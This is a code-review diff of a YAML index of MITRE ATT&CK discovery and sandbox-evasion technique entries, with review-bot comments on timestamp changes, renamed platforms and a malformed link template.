@@ -50219,9 +50873,14 @@ discovery:
implementation and monitoring required. Monitoring for suspicious processes
being spawned that gather a variety of system information or perform other
forms of Discovery, especially in a short period of time, may aid in detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -50231,102 +50890,137 @@ discovery:
- Signature-based detection
- Static File Analysis
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+ created: '2020-03-06T21:11:11.225Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/003
+ external_id: T1497.003
+ - source_name: Joe Sec Nymaim
+ description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+ API hammering. Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/3660886847485093803
+ - source_name: Joe Sec Trickbot
+ description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+ Retrieved September 30, 2021.
+ url: https://www.joesecurity.org/blog/498839998833561473
+ - source_name: ISACA Malware Tricks
+ description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+ Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+ url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+ - source_name: Revil Independence Day
+ description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+ supply chain exploit to attack hundreds of businesses. Retrieved September
+ 30, 2021.'
+ url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+ - source_name: Netskope Nitol
+ description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+ with evasive sandbox analysis technique. Retrieved September 30, 2021.
+ url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1497.003
atomic_tests: []
T1580:
technique:
- x_mitre_platforms:
- - IaaS
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-09-30T13:28:37.415Z'
+ name: Cloud Infrastructure Discovery
+ description: |-
+ An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
+
+ Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
+
+ An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: discovery
x_mitre_contributors:
- Regina Elwell
- Praetorian
- Isif Ibrahima, Mandiant
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_deprecated: false
+ x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
+ components. Monitor logs for actions that could be taken to gather information
+ about cloud infrastructure, including the use of discovery API calls by new
+ or unexpected users and enumerations from unknown or malicious IP addresses.
+ To reduce false positives, valid change management procedures could introduce
+ a known identifier that is logged with the change (e.g., tag or header) if
+ supported by the cloud provider, to help distinguish valid, expected actions
+ from malicious ones.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - IaaS
+ x_mitre_version: '1.3'
+ x_mitre_data_sources:
+ - 'Instance: Instance Enumeration'
+ - 'Cloud Storage: Cloud Storage Enumeration'
+ - 'Volume: Volume Enumeration'
+ - 'Snapshot: Snapshot Enumeration'
type: attack-pattern
id: attack-pattern--57a3d31a-d04f-4663-b2da-7df8ec3f8c9d
created: '2020-08-20T17:51:25.671Z'
- x_mitre_version: '1.3'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1580
url: https://attack.mitre.org/techniques/T1580
+ external_id: T1580
- source_name: Expel IO Evil in AWS
- url: https://expel.io/blog/finding-evil-in-aws/
description: A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding
Evil in AWS. Retrieved June 25, 2020.
+ url: https://expel.io/blog/finding-evil-in-aws/
- source_name: AWS Head Bucket
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
description: Amazon Web Services. (n.d.). AWS HeadBucket. Retrieved February
14, 2022.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_HeadBucket.html
- source_name: AWS Get Public Access Block
- url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetPublicAccessBlock.html
- source_name: AWS Describe DB Instances
- url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
description: Amazon Web Services. (n.d.). Retrieved May 28, 2021.
+ url: https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DescribeDBInstances.html
- source_name: Amazon Describe Instance
- url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
description: Amazon. (n.d.). describe-instance-information. Retrieved March
3, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/ssm/describe-instance-information.html
- source_name: Amazon Describe Instances API
- url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
description: Amazon. (n.d.). DescribeInstances. Retrieved May 26, 2020.
+ url: https://docs.aws.amazon.com/AWSEC2/latest/APIReference/API_DescribeInstances.html
- source_name: Google Compute Instances
- url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
description: Google. (n.d.). gcloud compute instances list. Retrieved May
26, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/compute/instances/list
- source_name: Mandiant M-Trends 2020
- url: https://content.fireeye.com/m-trends/rpt-m-trends-2020
description: Mandiant. (2020, February). M-Trends 2020. Retrieved April 24,
2020.
+ url: https://www.mandiant.com/sites/default/files/2021-09/mtrends-2020.pdf
- source_name: Microsoft AZ CLI
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Malwarebytes OSINT Leaky Buckets - Hioureas
- url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
description: 'Vasilios Hioureas. (2019, September 13). Hacking with AWS: incorporating
leaky buckets into your OSINT workflow. Retrieved February 14, 2022.'
- x_mitre_deprecated: false
- revoked: false
- description: |-
- An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.
-
- Cloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances
API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets
API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket
API to determine a bucket’s existence along with access permissions of the request sender, or the GetPublicAccessBlock
API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list
command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list
lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)
-
- An adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances
to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Cloud Infrastructure Discovery
- x_mitre_detection: Establish centralized logging for the activity of cloud infrastructure
- components. Monitor logs for actions that could be taken to gather information
- about cloud infrastructure, including the use of discovery API calls by new
- or unexpected users and enumerations from unknown or malicious IP addresses.
- To reduce false positives, valid change management procedures could introduce
- a known identifier that is logged with the change (e.g., tag or header) if
- supported by the cloud provider, to help distinguish valid, expected actions
- from malicious ones.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: discovery
- x_mitre_is_subtechnique: false
- x_mitre_data_sources:
- - 'Instance: Instance Enumeration'
- - 'Cloud Storage: Cloud Storage Enumeration'
- - 'Volume: Volume Enumeration'
- - 'Snapshot: Snapshot Enumeration'
- x_mitre_attack_spec_version: 2.1.0
+ url: https://blog.malwarebytes.com/researchers-corner/2019/09/hacking-with-aws-incorporating-leaky-buckets-osint-workflow/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1580
atomic_tests: []
T1217:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-16T14:24:40.625Z'
name: Browser Bookmark Discovery
description: |-
Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)
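Review bot: `spec_version: '2.1'` is removed from the T1580 entry (the `- spec_version: '2.1'` line just above `identifier: T1580`) with no replacement, while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0; please confirm that nothing consuming these index files reads `spec_version`, since the same removal recurs in the following hunks. The rest of this hunk reorders keys around an otherwise unchanged T1580 description, and the T1217 `modified` value moves backwards from `2023-05-09T14:00:00.188Z` to `2023-04-16T14:24:40.625Z`, so the PR description should state which ATT&CK STIX bundle the index was regenerated from.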
@@ -50380,7 +51074,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests: []
T1016:
@@ -50410,7 +51103,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
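Review bot: the replacement detection text introduces a malformed template, `{{LinkById|T1059.008}` (two opening braces, one closing), in place of `(LinkById: T1059.008)`, and it does not match the markdown-link form used later in the same sentence (`[PowerShell](https://attack.mitre.org/techniques/T1059/001)`). If the generator copies upstream text verbatim, this should either be post-processed into a link of the same form (the T1059.008 path would follow the same pattern as the T1059/001 link) or fixed at the source before merging; otherwise the T1016 detection text ships with a literal `{{LinkById|...}` fragment.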
@@ -50448,12 +51141,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests: []
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -50480,14 +51172,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
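Review bot: the T1087 platform list drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider` (version `2.4` to `2.5`); any consumer that filters this index by the old platform strings will no longer match T1087, so check that per-platform index generation and any filtering logic are updated for the renamed platforms in the same change rather than silently losing these techniques.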
@@ -50516,7 +51207,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
@@ -50576,7 +51266,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
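Review bot: `modified` for T1482 moves backwards, from `2022-11-08T14:00:00.188Z` to `2022-06-16T19:18:22.305Z`, which a regeneration from a newer ATT&CK release would not normally produce; the old values across this patch share the `14:00:00.188Z` time and look like a release-level timestamp, whereas the new ones look like each STIX object's own `modified`, so the generator or source bundle has changed what this field means. Worth confirming that is intentional and noting it in the PR description, since tooling that sorts or diffs entries by `modified` will now treat these entries as older.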
@@ -50595,7 +51285,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -50664,12 +51353,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests: []
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -50746,40 +51434,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -50791,6 +51450,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -50801,8 +51464,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -50812,9 +51481,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
@@ -50847,7 +51535,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
@@ -50865,12 +51553,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -50878,11 +51565,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -50893,7 +51583,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -50907,6 +51597,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -50926,56 +51620,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
@@ -50997,19 +51646,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
